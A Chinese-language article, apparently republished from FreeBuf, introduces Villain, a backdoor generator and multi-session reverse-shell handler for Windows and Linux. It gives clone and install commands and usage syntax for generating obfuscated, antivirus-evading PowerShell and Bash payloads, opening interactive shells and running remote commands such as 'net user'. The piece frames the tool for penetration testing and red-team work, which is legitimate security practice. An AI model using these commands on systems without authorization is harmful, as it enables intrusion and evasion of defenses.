前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Villain:一款针对Windows和Linux的后门生成和多会话处理工具

Villain:一款针对Windows和Linux的后门生成和多会话处理工具

作者头像
FB客服
发布2023-02-10 16:39:18
5150
发布2023-02-10 16:39:18
举报
文章被收录于专栏:FreeBuf

关于Villain

Villain是一款针对Windows和Linux操作系统设计和开发的后门生成与多会话处理工具,该工具允许广大研究人员与兄弟服务器或其他运行了Villain的设备进行连接,并共享他们的后门会话,以方便广大研究人员和团队之间的协同工作。

Villain生成Payload所采用的机制基于HoaxShell实现,也可以说Villain在这方面是HoaxShell的一个升级版本。

工具特性

1、Villain包含了一个内置的针对Windows平台的Payload自动混淆功能,旨在帮助广大研究人员绕过AV解决方案; 2、该工具生成的每一个Payload只能使用一次,已使用过的Payload不能重新用于会话建立; 3、兄弟服务器之间的通信是AES加密的,使用接收方兄弟服务器的ID作为加密密钥,本地服务器的ID的16个第一字节作为IV。在两个兄弟服务器的初始连接握手期间,每个服务器的ID都是明文交换的,这意味着握手可以被捕获并用于解密兄弟服务器间的通信。我知道这样很“弱”,因为该工具设计用于渗透测试/红色团队评估期间,对此加密模式应该足够了; 4、相互连接的Villain实例(兄弟服务器)也必须能够直接到达彼此。我打算添加一个网络路由映射实用程序,以便兄弟服务器可以将彼此用作代理,以实现它们之间的跨网络通信;

工具运行机制

下图显示的是HTTP(S)反向Shell的运行机制:

工具安装

由于该工具基于Python 3开发,因此广大研究人员首先需要在本地设备上安装并配置好Python 3环境。接下来,使用下列命令将该项目源码克隆至本地:

代码语言:javascript
复制
git clone https://github.com/t3l3machus/Villain
(向右滑动、查看更多)

然后切换到项目目录下,并使用pip命令和项目提供的requirements.txt来安装该工具所需的其他依赖组件:

代码语言:javascript
复制
cd ./Villain

pip3 install -r requirements.txt

工具使用

生成后门Payload

我们可以使用generate命令来生成针对Windows或Linux设备的后门Payload:

代码语言:javascript
复制
generate os=<OS Type> lhost=<IP or INTERFACE> [ exec_outfile=<REMOTE PATH> domain=<DOMAIN>] [ obfuscate encode constraint_mode ]
(向右滑动、查看更多)

支持的后门Payload类型如下:

Windows:PowerShell Linux:Bash

使用样例:

代码语言:javascript
复制
# For Windows:

Villain > generate os=windows lhost=eth0 obfuscate

Villain > generate os=windows lhost=192.168.12.36 exec_outfile="C:\Users\\\$env:USERNAME\.local\hack.ps1" encode
# For Linux:

Villain > generate os=linux lhost=192.168.12.62

连接兄弟服务器

我们可以使用connect命令连接运行了Villain的设备并共享后门会话:

代码语言:javascript
复制
connect <IP> <CORE SERVER PORT>

Shell命令

我们可以使用shell命令来针对一个会话开启交互式HoaxShell:

代码语言:javascript
复制
shell <SESSION ID or ALIAS>

exec命令

exec命令可以针对一个会话在文件系统中执行引用的命令或脚本:

代码语言:javascript
复制
exec </path/to/local/file> <SESSION ID or ALIAS>

exec 'net user;Get-Date' <SESSION ID or ALIAS>

工具运行截图

视频演示

视频地址1:https://www.youtube.com/watch?v=pTUggbSCqA0

视频地址2:https://www.youtube.com/watch?v=NqZEmBsLCvQ

许可证协议

本项目的开发与发布遵循CC知识共享许可协议。

项目地址

Villain:https://github.com/t3l3machus/Villain

参考资料

https://github.com/t3l3machus/hoaxshell https://www.y0utube.com/watch?v=FVbdZSGkzhs https://www.y0utube.com/watch?v=8cVyrBSy0zo

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-01-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 关于Villain
  • 工具特性
  • 工具运行机制
  • 工具安装
  • 工具使用
    • 生成后门Payload
      • 连接兄弟服务器
        • Shell命令
          • exec命令
          • 工具运行截图
          • 视频演示
          • 许可证协议
          • 项目地址
          • 参考资料
          相关产品与服务
          网站渗透测试
          网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档